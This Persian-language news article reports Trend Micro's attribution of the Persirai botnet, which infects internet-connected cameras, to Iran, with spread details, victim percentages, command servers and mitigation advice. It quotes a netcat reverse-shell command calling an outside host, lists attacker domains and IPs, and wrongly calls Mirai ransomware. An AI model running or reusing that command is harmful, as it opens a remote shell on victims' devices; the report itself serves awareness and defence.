هک و نفوذ

به گزارش سایبربان

انجام یک حمله سایبری بزرگ بر بستر اینترنت اشیاء و اتهام به ایران

ترند میکرو، حمله سایبری پرسیرای که بر بستر اینترنت اشیاء انجام شده است را به ایران نسبت داد.

انجام یک حمله سایبری بزرگ بر بستر اینترنت اشیاء و اتهام به ایران

به گزارش واحد هک و نفوذ سایبربان؛ شرکت امنیت سایبری ترند میکرو، در جدیدترین گزارش خود، مدعی شد که یک حمله سایبری بر بستر اینترنت اشیاء را شناسایی کرده است که با استفاده از شناسه‌های کاربری دوربین‌ها و ابزارآلات ضبط تصاویر انجام شده و پرسیرای (PERSIRAI) نام دارد.
به ادعای شرکت امنیت سایبری ترند میکرو، بررسی سابقه این حمله سایبری، نشان می‌دهد که یک موسسه تحقیقاتی ایرانی، در پشت پرده آی‌پی‌های استفاده شده در این حمله قرار دارد و محدودیت استفاده از این آی‌پی‌ها، صرفاً برای کاربران ایرانی، بر این موضوع تأکید می‌کند که احتمالاً این حمله، از جانب دولت ایران حمایت می‌شود.
در بخشی از اطلاعیه ترند میکرو در این زمینه آمده است: «سرورهای فرماندهی و کنترلی که ما در این زمینه کشف کرده‌ایم، از کدهای ایرانی (.IR) بهره‌برداری کرده‌اند. این کدهای مشخصاً مربوط به ایران، توسط یک موسسه تحقیقاتی ایرانی مدیریت می‌شود و همین موضوع سبب می‌شود تا کدهای مذکور، فقط و فقط توسط ایرانی‌ها مورداستفاده قرار بگیرند.»
در یکی از انجمن‌های شبکه اجتماعی ردیت، یادداشتی آمده است که مدعی است: «من کدهای مذکور را در دو شناسه کاربری دوربین (nc load.gtpnet.ir 1234 -e /bin/sh) یافته‌ام و نگران از این موضوع هستم که دامنه استفاده شده، متعلق به چه کسی است؟ بر اساس آن چیزی که من می‌دانم، این یک آدرس ایرانی است که در whois. Ive نیز ذکر شده است و پیش‌تر، یک دوربین اتاق بچه را هک کرده است.»
به ادعای کارشناسان امنیتی، این حمله سایبری، با استفاده از کدهای باج افزاری حمله موفق میرای انجام شده است. این باج افزار، در سال 2016، با استفاده از آی‌پی‌های متعلق به دوربین‌های مداربسته، موفق شده بود برخی ارائه‌دهندگان اینترنت در آمریکا را با مشکل مواجه نماید و یکی از بزرگ‌ترین حملات سایبری تاریخ لقب بگیرد. بر اساس گزارش‌هایی که تاکنون درباره این حمله منتشر شد، 120 هزار آی پی در این حمله شناسایی شده است و تأکید می‌کند که حدود 30 درصد از قربانیان پرسیرای، اهدافی در چین هستند. علاوه بر آن، حدود 3 درصد از قربانیان در ایتالیا، 3 درصد در انگلستان و 8 درصد در آمریکا قرار دارند.
بر اساس گزارش‌های موجود، این حمله از چند جهت نگران‌کننده است. این حمله، با استفاده از کدهای متن‌باز میرای صورت پذیرفت و این، نشان‌دهنده در دسترس بودن کدهای آن است. کارشناسان معتقد هستند در دسترس بودن کدهای این حمله سایبری، راه را برای سایر هکرها، به جهت سازمان‌دهی انواع مختلفی از این حمله، باز می‌گذارد.
پرسیرای، یک حمله بسیار مخفیانه است و به صورتی عمل می‌کند که بسیاری از مالکان این دوربین‌ها، به هیچ عنوان متوجه نمی‌شوند که شبکه آن‌ها، به بدافزار آلوده شده است. خطرناک‌ترین رویدادی که در این مورد این حمله به چشم می‌خورد، این است که سرورهای کنترل و فرماندهی این بدافزار، از آی‌پی‌های ایرانی بهره‌برداری کرده‌اند.
برخی از آی‌پی‌هایی که در این حمله، آلوده شده‌اند به شرح ذیل هستند:
 load.gtpnet.ir
 ntp.gtpnet.ir
 185.62.189.232
 95.85.38.103

پرسیرای به نحوی عمل می‌کند که در ابتدا، خود را روی شبکه دوربین نصب می‌کند و پس‌ازآن، با مخفی کردن فایل نصبی، با پنهان شدن، در بخش حافظه (مموری) فعال می‌مانند. در ادامه، این بدافزار، برخی نرم‌افزارهای کنترلی و مسدودکننده را روی شبکه قربانی موردنظر خود، نصب می‌کند. به‌محض برقرار شدن اولین ارتباط بین سروهای کنترل و فرماندهی و سرورهای شبکه آلوده‌شده، دوربین‌های آلوده‌شده، به دنبال سایر دوربین‌های موجود در شبکه و آلوده کردن آن‌ها خواهند پرداخت.
بدافزار پرسیرای، در ادامه فعالیت خود، با استفاده از ftpupdate.sh و ftpupload.sh از دسترسی سایر حفره‌های روز صفرم به دوربین‌های آلوده‌شده جلوگیری می‌کند. این اقدام پرسیرای، ممکن است برای جلوگیری از بروز حملات تکراری یا دسترسی سایر بات نت‌ها، به شبکه دوربین‌هایی باشد که به‌تازگی به کنترل این بدافزار اینترنت اشیاء درآمده‌اند. از طرفی، ادامه فعالیت این بدافزار در مموری، بدین معناست که با ریست کردن دوربین‌ها، این بدافزار ظاهراً از بین می‌رود، اما تا زمانی که اقدامات امنیتی مناسب در رابطه با آن صورت نپذیرد، سیستم آلوده‌شده در برابر حمله پرسیرای آسیب‌پذیر است.
باوجودآنکه متخصصان شرکت امنیت سایبری ترند میکروی ژاپن، به کاربران دوربین‌های مداربسته تحت شبکه تأکید کرده است تا نسبت به تغییر رمزهای عبور خود اقدام کنند، عده‌ای دیگر معتقدند که پرسیرای، به رمزهای عبور وابسته نیست و به دنبال سرقت رمزهای عبور نیز نیست.
یکی دیگر از راهبردهایی که کارشناسان امنیتی، برای مقابله با این بدافزار ارائه داده‌اند، این است که قابلیت Universal Plug and Play را بر روی روترها غیرفعال کرد. این قابلیت، یک پروتکل شبکه است که به ابزارهایی نظیر دوربین‌های تحت شبکه، اجازه می‌دهد تا پورتی را باز کنند که به مشابه یک سرور عمل می‌کند. همچنین این قابلیت، به ابزارهای متصل، اجازه می‌دهد تا به یک هدف قابل‌رؤیت برای بدافزارهایی نظیر پرسیرای تبدیل شوند. کاربران همچنین می‌توانند دوربین‌های تحت شبکه را از سرورهای خود خارج کرده و سپس با ساخت یک شبکه خصوصی، آن‌ها را از راه دور کنترل کنند.


نظر دهید

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Enter the characters shown in the image.